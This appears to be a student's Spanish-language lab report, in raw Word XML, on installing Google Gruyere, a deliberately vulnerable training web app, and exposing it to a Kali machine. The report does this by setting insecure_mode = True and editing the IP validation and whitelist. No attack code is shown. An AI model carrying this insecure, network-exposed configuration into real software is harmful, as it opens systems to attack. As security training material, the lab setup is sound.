    <w:p w14:paraId="4C45D8C1" w14:textId="7F122257" w:rsidR="005C4C17" w:rsidRDefault="005C4C17"/>
    <w:p w14:paraId="31847344" w14:textId="56FAE1D7" w:rsidR="005C4C17" w:rsidRDefault="005C4C17">
      <w:r w:rsidRPr="005C4C17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFAD4E9" wp14:editId="5018659E">
            <wp:extent cx="5400040" cy="40500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4050030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B34D40" w14:textId="5B5BC8B3" w:rsidR="00FD5144" w:rsidRDefault="00FD5144">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Esta es la configuración de la maquina:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F5CA8" w14:textId="75DB15E4" w:rsidR="00FD5144" w:rsidRDefault="00FD5144">
      <w:r>
        <w:t>Nombre y sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54966979" w14:textId="18D0EACD" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="6DDAC371" w14:textId="6DF98413" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="184CC910" w14:textId="54CA1D8A" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="68DC0FD9" w14:textId="32DD96E4" w:rsidR="00FD5144" w:rsidRDefault="00244599">
      <w:r w:rsidRPr="00244599">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F27733" wp14:editId="785B3F44">
            <wp:extent cx="5397533" cy="2282342"/>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9051" cy="2287212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC8105" w14:textId="477E656C" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="5705BA72" w14:textId="11CE9BEE" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="3E40BE3F" w14:textId="54CF46FC" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="2EE3120E" w14:textId="58387B20" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="09D864E0" w14:textId="4DA2AE94" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="75104F5C" w14:textId="2A325B12" w:rsidR="00FD5144" w:rsidRDefault="00FD5144">
      <w:r>
        <w:t>Configuración de sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27BC58" w14:textId="45781E23" w:rsidR="00FD5144" w:rsidRDefault="00244599">
      <w:r w:rsidRPr="00244599">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C290659" wp14:editId="464EC101">
            <wp:extent cx="5400040" cy="37903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790315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBBCBD" w14:textId="34FFFB63" w:rsidR="00FD5144" w:rsidRDefault="00FD5144">
      <w:r>
        <w:t>Configuración de red, en modo puente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B34604" w14:textId="344D3559" w:rsidR="00FD5144" w:rsidRDefault="00244599">
      <w:r w:rsidRPr="00244599">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11045779" wp14:editId="488297CC">
            <wp:extent cx="5400040" cy="379031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790315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C02D7" w14:textId="68DC863F" w:rsidR="00B70D64" w:rsidRDefault="00B70D64"/>
    <w:p w14:paraId="6F170E61" w14:textId="628F83DD" w:rsidR="00FD5144" w:rsidRDefault="00FD5144"/>
    <w:p w14:paraId="36C2B364" w14:textId="19423CFC" w:rsidR="00FD5144" w:rsidRDefault="00FD5144">
      <w:r>
        <w:t>Comprobación de la versión del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA7856" w14:textId="3D9D56EC" w:rsidR="00B70D64" w:rsidRDefault="00B70D64">
      <w:r w:rsidRPr="00B70D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AF41B62" wp14:editId="425A744E">
            <wp:extent cx="5400040" cy="3526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526155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C7187" w14:textId="563C210F" w:rsidR="00E456B4" w:rsidRDefault="00E456B4"/>
    <w:p w14:paraId="5BCD0E32" w14:textId="64A67485" w:rsidR="00E456B4" w:rsidRDefault="00E456B4"/>
    <w:p w14:paraId="60D102C8" w14:textId="77777777" w:rsidR="00E456B4" w:rsidRDefault="00E456B4"/>
    <w:p w14:paraId="062B0E9E" w14:textId="4A01124B" w:rsidR="00B70D64" w:rsidRDefault="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El primer paso para instalar gruyere es descargarlo desde su página oficial, desde este </w:t>
      </w:r>
      <w:r w:rsidR="00711AF7">
        <w:t>enlace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidRPr="002016D3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://google-gruyere.appspot.com/part1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D89BC" w14:textId="2DE5789B" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5750ACD2" w14:textId="4D02DE50" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02177DBB" w14:textId="460132D5" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B70D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044A4D40" wp14:editId="643E52F3">
            <wp:extent cx="5400040" cy="51803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5180330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707E734" w14:textId="3CD41EEF" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B394DC" w14:textId="53487EEB" w:rsidR="00B70D64" w:rsidRDefault="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>El segundo paso es extraer el fichero y ejecutar gruyere:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39EE5E" w14:textId="0C7A3C55" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A68825" w14:textId="55F5F08B" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Primero creo la carpeta donde lo voy a ejecutar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5719EF6B" w14:textId="67491E92" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B70D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A1546E5" wp14:editId="5BB26E95">
            <wp:extent cx="5400040" cy="35604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560445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26BC13" w14:textId="2E8FFA3A" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647F508B" w14:textId="0341DDA9" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E144DC" w14:textId="4A366BEF" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B70D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32313255" wp14:editId="16154CF7">
            <wp:extent cx="5400040" cy="49822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4982210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D77F40" w14:textId="4D9FE7F0" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A91BF2D" w14:textId="00EEAFC4" w:rsidR="00B70D64" w:rsidRDefault="00352926" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Y,</w:t>
      </w:r>
      <w:r w:rsidR="00B70D64">
        <w:t xml:space="preserve"> por último, ejecutarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674C503" w14:textId="48B6C31B" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2667B36F" w14:textId="35BF686F" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B70D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AA1F15" wp14:editId="3E1E9177">
            <wp:extent cx="5400040" cy="50031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5003165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B163AE0" w14:textId="77496919" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5651E961" w14:textId="4E45340F" w:rsidR="00B70D64" w:rsidRDefault="00B70D64" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Me da este error, por no tener instalado python2.7, pues lo instalaré</w:t>
      </w:r>
      <w:r w:rsidR="00B853ED">
        <w:t xml:space="preserve"> con este script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9E366" w14:textId="10856346" w:rsidR="00B853ED" w:rsidRDefault="00B853ED" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683E3624" w14:textId="6FBE4FC7" w:rsidR="00B853ED" w:rsidRDefault="00B853ED" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B853ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC9BA46" wp14:editId="69A52134">
            <wp:extent cx="5400040" cy="36461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646170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73077921" w14:textId="00BEE04D" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AFA072" w14:textId="7BF5B009" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora sí, ejecuto gruyere:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478EF21F" w14:textId="51EB6966" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F375B99" w14:textId="77777777" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D1761B" w14:textId="2C1DE8AE" w:rsidR="00B70D64" w:rsidRDefault="00D65B4A" w:rsidP="00B70D64">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00D65B4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12742745" wp14:editId="03953BAB">
            <wp:extent cx="5400040" cy="36233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623310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0805839F" w14:textId="535C7880" w:rsidR="00AD494D" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004439F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424F8E89" w14:textId="1D87AAAE" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3040FD" w14:textId="2A9EC536" w:rsidR="004439F4" w:rsidRDefault="00B853ED" w:rsidP="00B853ED">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42364A01" w14:textId="5EB33EE8" w:rsidR="004439F4" w:rsidRDefault="00D65B4A" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00D65B4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED92A4E" wp14:editId="0379475C">
            <wp:extent cx="5400040" cy="58051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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8123C0" w14:textId="7E452B94" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA5BAC3" w14:textId="7BCB4D41" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>El tercer paso es configurar gruyere para que no solo funcionen en local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE73BC" w14:textId="6D93C595" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590FD4D9" w14:textId="4F655C14" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8A3D89" w14:textId="15471FD1" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E29A891" w14:textId="23B43079" w:rsidR="004439F4" w:rsidRDefault="00D65B4A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D65B4A">
        <w:t>Primero cambiar la variable insecure_mode = True</w:t>
      </w:r>
      <w:r>
        <w:t>, en el fichero gruyere.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B46188" w14:textId="3AA02248" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00D65B4A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D65B4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659B83AA" wp14:editId="3A7AA674">
            <wp:extent cx="5400040" cy="58051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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4FFFCC" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="00D65B4A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F718E9" w14:textId="719B89E7" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cambiar las líneas de las validaciones, ahora si la variable anterior es true, la </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que funcionara de servidor será la IP de nuestra máquina no localhost, con esto podrán vernos desde otras máquinas</w:t>
      </w:r>
      <w:r w:rsidR="00B45A6A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C18F6" w14:textId="0315AA74" w:rsidR="003F2FBB" w:rsidRDefault="00B45A6A" w:rsidP="003F2FBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7138E2DA" wp14:editId="1032805E">
            <wp:extent cx="5400040" cy="580517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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F9E78" w14:textId="63DF39A2" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00D65B4A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B2E61B" w14:textId="77777777" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00D65B4A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8634CF" w14:textId="5A560C65" w:rsidR="00D65B4A" w:rsidRDefault="003F2FBB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ahora tendré que poner las direcciones IP que podrán acceder a este servicio</w:t>
      </w:r>
      <w:r w:rsidR="00B45A6A">
        <w:t xml:space="preserve">, que será una máquina Kali con esta </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00B45A6A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62040F" w14:textId="595CC82A" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CCF17C" wp14:editId="6F1D7D4C">
            <wp:extent cx="5400040" cy="58051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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777E154" w14:textId="41EAF4BD" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02032A78" w14:textId="36896332" w:rsidR="008353EE" w:rsidRDefault="00B45A6A" w:rsidP="008353EE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3121B924" wp14:editId="643F78EC">
            <wp:extent cx="5400040" cy="58051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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D43CBD1" w14:textId="4F3E59A6" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260211B1" w14:textId="27EAA556" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comprobación de que la puedo ver en la máquina Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74487935" w14:textId="6FD58A43" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E262B1E" w14:textId="495104A0" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442B492A" w14:textId="7794E7E3" w:rsidR="00B45A6A" w:rsidRDefault="00B45A6A" w:rsidP="00B45A6A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00B45A6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2690D43F" wp14:editId="494E2D74">
            <wp:extent cx="5400040" cy="24949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494915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA9C73" w14:textId="77777777" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="7B859DF2" w14:textId="680DFFE2" w:rsidR="00D65B4A" w:rsidRDefault="00D65B4A" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="7C1E66B3" w14:textId="3556ECEB" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="62CBD201" w14:textId="7B107AA1" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="423D6966" w14:textId="4C2D51CE" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="01A826A7" w14:textId="105C3E1F" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="3DC7D7EB" w14:textId="76BEBAD6" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="0E12A36C" w14:textId="0DFF4E10" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="1662616E" w14:textId="7CE34288" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
    <w:p w14:paraId="357C4CD9" w14:textId="2D9401A2" w:rsidR="00D210C7" w:rsidRDefault="00D210C7" w:rsidP="00D65B4A"/>
